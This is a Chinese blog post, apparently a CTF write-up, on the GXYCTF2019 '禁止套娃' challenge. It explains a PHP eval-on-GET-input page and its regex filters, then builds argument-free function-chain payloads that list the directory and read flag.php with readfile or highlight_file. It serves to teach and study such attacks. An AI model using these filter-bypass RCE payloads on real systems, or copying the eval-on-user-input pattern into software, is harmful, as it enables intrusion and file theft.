其他分享
首页 > 其他分享> > 无参数RCE

无参数RCE

作者:互联网

 [GXYCTF2019]禁止套娃

<?php
include "flag.php";//执行并包含flag.php
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){//以get方式提交exp,非空且为字符串
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

第一个

正则表达式将会过滤data://,filter://,php://,phar://等伪协议读取flag.php

php中的!号作用通俗点理解就是否定的意思 比如: a==b 表示a要等于b, !a==b 表示a不等于b

pret_match()函数是正则表权达式匹配, 匹配成功就返回true, 匹配不成功就返回false 前面加个!那就需要这个函数返回false, 也就是没有匹配上

第二个

preg_replace()函数,preg_replace('/[a-z,]+((?R)?)/', NULL, $GET['exp']),主要功能就是限制我们传输进来的必须是纯小写字母的函数,而且不能携带参数

第三个

则直白的过滤了et|na|info|dec|bin|hex|oct|pi|log

一三两个规则很好理解,关键在于第二个preg_replace()函数的具体作用,也就是无参数函数校验

什么是无参数函数RCE

当我们有eval($_GET['exp']);时,代表着拥有了一句话木马,可以getshell,但是如果有

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['exp']);
}

限制时,我们使用的参数则无法通过校验,但是允许如下格式通过

print_r(scandir('a()'));可以使用
print_r(scandir('a(b(c()))'));可以使用
print_r(scandir('123'));不可以使用

而preg_replace内的(?R)代表引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。

既然允许通过print_r(scandir('a(b(c()))'));这种格式,将需要查看的flag套娃在内,如scandir()函数可以扫描当前目录下的文件

在phpstudy的www下创建一个php文件:

<?php
print_r(scandir('.'));
?>

访问:

 

既然这样,利用scandir('.')即可尝试查看flag,可惜失败了

这里引入两个函数

  1. localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.

  2. current()函数 返回数组中的当前单元, 默认取第一个值

  3. 将第一个函数套入第二个函数,也就是current(localeconv()),这样就永远返回'.'

构造payload:

?exp=print_r(scandir(current(localeconv())));

既然查看到flag.php在倒数第二个数组内,只要解决如何查看的问题即可提交flag

  1. array_reverse()以相反的元素顺序返回数组

  2. next()函数将数组中内部指针向前移动一位

构造payload:

?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

如何读取flag?

  1. readfile()

  2. highlight_file()

构造payload(都可得flag):

  1. ?exp=print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));

  2. ?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

标签:函数,GET,preg,flag,参数,exp,RCE,scandir
来源: https://blog.csdn.net/qq_58784379/article/details/120584774